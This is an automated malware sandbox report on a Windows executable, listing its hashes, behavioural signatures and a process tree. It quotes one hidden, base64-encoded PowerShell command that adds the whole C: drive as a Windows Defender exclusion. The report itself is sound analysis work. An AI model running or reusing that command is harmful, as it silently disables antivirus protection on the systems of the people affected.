Analysis
max time kernel: 82s
max time network: 45s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 12/09/2022, 15:26
Static task: static1
Behavioral task: behavioral1
  Sample: 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  Resource: win10v2004-20220812-en
General
Target: 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
Size: 2.4MB
MD5: a0b623e5db90e7b7f91a350fcbfd661b
SHA1: 12e71a986e8f65a19c7e7a99da8c049c70f533b5
SHA256: 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c
SHA512: c75234cea7a872c7314a895d17ce6ff1a20f28f76631f21ca6f4e9fc8baf39287fe1d6bc0bf0b4005ca25c4816cebb4e91146d074e24308b702e45e78c2c00ca
SSDEEP: 49152:7Rozi307t/SoJvnGjQUlJrQu6Kci17kejlkH1og/61H99GoBKxCdMr0B0IaV2aLh:7RoziE7JnGkUTrQfipjlkuH1HbGVxCdI
Malware Config
Signatures
Drops file in System32 directory (1 IoC)
  description: File opened for modification
  ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  process: powershell.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid  process
  1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  1160 powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description            pid  process
  Token: SeDebugPrivilege 1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  Token: SeDebugPrivilege 1160 powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  description                      pid  process      procid_target
  PID 632 wrote to memory of 1160  632  taskeng.exe  31
  PID 632 wrote to memory of 1160  632  taskeng.exe  31
  PID 632 wrote to memory of 1160  632  taskeng.exe  31
Processes
C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 1100

C:\Windows\system32\taskeng.exe
  command line: taskeng.exe {22D7CA5E-F0EA-4A7C-BA0D-7007106BE00B} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:S4U:
  - Suspicious use of WriteProcessMemory
  PID: 632
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of taskeng.exe)
      command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1160